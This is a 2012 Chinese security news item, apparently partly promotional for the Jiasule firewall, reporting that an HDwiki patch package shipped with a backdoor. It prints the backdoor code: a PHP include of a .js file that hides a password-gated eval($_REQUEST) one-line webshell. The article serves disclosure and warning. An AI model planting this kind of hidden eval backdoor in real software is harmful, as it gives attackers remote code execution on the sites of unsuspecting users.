互动百科旗下HDwiki漏洞补丁包暗藏后门 加速乐紧急防御

 2012年8月10日消息，日前某安全平台爆出国内知名百科服务提供商互动百科旗下开源软件HDwiki存在XSS 0day漏洞后，官方于昨日紧急发布了“HDwiki各版本新漏洞补丁包2012-08-09”。然而本该平息的漏洞风波却因此次补丁发布掀起轩然大波。据多名白帽子宣称：本次发布的补丁存在内置后门。

<?php
/**
词条编辑页面的参考资料
*/
require_once(dirname(__FILE__)."/../js/jqeditor/hdwiki.js"); // 就是这里， 好端端的PHP。include js文件干什么
!defined('IN_HDWIKI') && exit('Access Denied');

class control extends base{

        function control(& $get,& $post){
                $this->base( & $get,& $post);
                $this->load("reference");

/../js/jqeditor/hdwiki.js内容如下：

              if (sha1(base64_encode(sha1(md5(base64_decode(sha1($_POST["fvckadmin"])).sha1($_POST["fvckadmin"]))))) == "b697afd0486d62a72afd3044ef259858b701814d"){
                       eval ($_REQUEST["mjj"]);
}
?>
function delSave(){
        $.post("index.php?doc-delsave",{did:g_docid},function(xml){
                if ('sucess' != xml.lastChild.firstChild.nodeValue){
                        alert('exception');
                }
        });
}

通过分析发现，该JS内容为一句话木马后门。

在该消息公布后，引起强烈关注。很多用户对官方该行为进行谴责。

最新消息：官方回应服务器遭入侵

在该后门事件公布后，最终官方在各种场合进行了回应

加速乐(www.jiasule.com)提醒用户：使用开源CMS程序前，请务必做好选择，尽量选择具有一定知名度的程序，同时建议使用加速乐免费网站防火墙，保护网站运营安全。针对即将到来的针对该漏洞的大规模扫描入侵攻击，加速乐已经紧急升级防御规则，对于该漏洞的扫描利用，将直接给予拦截，保护网站安全。

当黑客对该漏洞进行扫描攻击时，加速乐将给予拦截